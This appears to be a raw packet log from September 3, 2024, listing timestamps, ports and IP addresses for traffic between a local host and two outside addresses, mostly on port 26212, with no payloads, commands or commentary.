Sep 3, 2024 17:13:17.073923111 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:17.074875116 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.074943066 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.076380968 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.076438904 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.076533079 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.076582909 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.076714993 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.076770067 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.077321053 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.077481031 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.078567028 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.078623056 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.079339027 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.079377890 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.079406023 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.079431057 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.079433918 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.079444885 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.079456091 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.079499006 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.079509974 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.079571009 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.079606056 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.079644918 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.079647064 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.079672098 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.079682112 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.080156088 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.080286980 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.081398964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:17.083331108 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.083340883 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.083385944 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.085098028 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.085115910 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.085156918 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.085180998 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.085341930 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.085351944 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.085361004 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.085402966 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.085421085 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.085495949 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.085530043 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.085561991 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.085577011 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.085648060 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.085695028 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.085788965 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.085844040 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.086062908 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086230040 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086232901 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.086246967 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086256981 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086266041 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086276054 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086289883 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.086308002 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.086342096 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.086711884 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086747885 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086774111 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.086810112 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.086831093 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086842060 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086850882 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086869001 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086878061 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086885929 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086894989 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086905956 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.086908102 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.087013960 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.087069988 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.087080002 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.087088108 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.087137938 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.087157011 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.087167978 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.087177038 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.087239981 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.087253094 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088439941 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088542938 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088551998 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088568926 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088731050 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088740110 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088778019 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088788986 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088898897 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088908911 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.088984013 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089072943 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089114904 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089131117 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089293957 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089371920 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089500904 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089510918 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089560986 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.089567900 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089581966 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089591026 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089646101 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.089683056 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089692116 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.089701891 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090320110 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090379000 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090389967 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090399027 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090555906 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090565920 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090574980 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090666056 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090737104 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090745926 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090753078 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090792894 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090802908 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090852022 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090903997 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090954065 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.090962887 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091063976 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091073036 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091082096 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091090918 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091126919 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091276884 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091286898 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091295004 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091304064 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091320038 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091329098 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091336966 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091536045 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091546059 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091605902 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091666937 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.091676950 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092099905 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092155933 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092446089 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092545033 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092554092 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092561960 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092621088 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092631102 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092645884 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092807055 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092817068 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.092974901 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.093036890 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.097409964 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.097547054 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.098242044 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.098407984 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.098417044 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.098819971 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099127054 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099390030 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099400043 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099409103 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099417925 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099440098 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099450111 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099457979 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099467039 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099476099 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099483967 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099493980 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099504948 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099513054 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099517107 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099525928 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099538088 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099545956 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099558115 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099565983 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099575043 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099582911 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099591970 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099603891 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099613905 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099617958 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099626064 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099634886 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099643946 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099653959 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099682093 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099690914 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099699974 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099709034 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099719048 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099726915 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099735975 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099744081 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099754095 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099761963 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099773884 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099781990 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099791050 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099798918 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099807978 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099817038 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099824905 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099834919 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099852085 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099860907 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099869013 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099877119 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099886894 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099950075 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099965096 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.099973917 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100024939 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.100090027 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.100106955 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100116014 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100130081 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100250006 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100260019 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100267887 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100277901 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100353956 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100367069 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100374937 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100383997 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100392103 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100402117 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100409985 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100418091 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100490093 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100498915 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100507975 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100512028 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100514889 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100522995 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100619078 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100627899 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100636005 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100644112 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100647926 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100656033 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100666046 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100673914 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100919962 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100929976 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100933075 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100940943 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100956917 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100965977 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100975990 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100986004 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.100994110 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.101002932 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.101011992 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.101073980 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.101083994 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.101092100 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.101095915 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.101104021 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.101114035 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.101285934 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.101355076 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.105586052 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105597973 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105602026 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105747938 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105756044 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105861902 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105873108 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105881929 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105890036 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105900049 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105907917 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.105916977 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106019974 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106029987 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106132030 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106141090 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106148005 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106157064 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106168032 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106273890 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106286049 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106290102 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106431961 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106446028 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106585979 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106595039 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106761932 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106770992 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106779099 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106865883 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106882095 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106892109 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106900930 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106909037 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106918097 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.106926918 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107011080 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107019901 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107028961 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107038021 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107044935 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107053995 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107136011 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107145071 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107152939 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107162952 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107172012 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107286930 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107296944 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107305050 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107314110 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107322931 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107400894 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107414961 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107424021 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107433081 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107441902 CEST	26212	49714	95.179.250.45	192.168.2.8
